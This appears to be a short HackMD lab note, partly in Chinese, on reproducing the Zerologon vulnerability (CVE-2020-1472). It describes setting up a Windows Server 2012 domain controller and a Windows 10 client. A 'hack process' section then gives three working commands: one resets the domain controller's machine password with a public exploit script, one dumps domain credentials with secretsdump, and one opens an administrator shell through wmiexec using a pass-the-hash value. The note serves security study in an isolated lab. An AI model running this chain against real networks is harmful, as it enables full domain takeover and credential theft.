# zero logon ## Environments Windows server 2012 Windows 10 kali linux - [CVE 2020 1472](https://github.com/VoidSec/CVE-2020-1472) ## Setting documents 1.Install Windows server 2012. 2.configure AD service. 2-1.設定機器IP(192.168.100.2)及DNS(127.0.0.1)及設定Administrator密碼 2-2.選擇「新增角色及功能」 2-3.選擇「角色型或功能型安裝」 2-4.選擇「Active Directory 網域服務」 2-5.安裝完成後,點選「更新」圖示並點選「黃色驚嘆號」 =>「將此伺服器升級為網域控制站」 2-5-1.點選「新增樹系(army.com)」->輸入「網域」名稱->點選「下一步」 2-6.勾選「網域名稱系統 (DNS) 伺服器,下一步會「自動搜尋」「NetBios」後一直下一步 2-7.安裝完成後,win+R ,輸入services.msc 開啟Server 、WorkStation及computer Browser(手動再啟動)服務 2-8.控制台->解除安裝程式-> 2-9.以Administrator權限ping army.com後AD設定即完成 3.Install Windows 10 4.加入網域 4-1.控制台->系統->進階系統設定->電腦名稱->網路識別 5.控制台->程式集->程式和功能->開啟或關閉Windows功能->SMB1.0/CIFS檔案共用資源全打勾 ## Hack process 1.清空account password sudo python3 cve-2020-1472-exploit.py -n WIN-TU0KD95M03F -t 192.168.0.2 2.取得憑證 python3 secretsdump.py -no-pass -just-dc test.com/WIN-TU0KD95M03F\$@192.168.0.2 3.運用憑證並取得shell python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ecffff0c3548187607a14bad0f88bb1 test.com/administrator@192.168.0.2
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up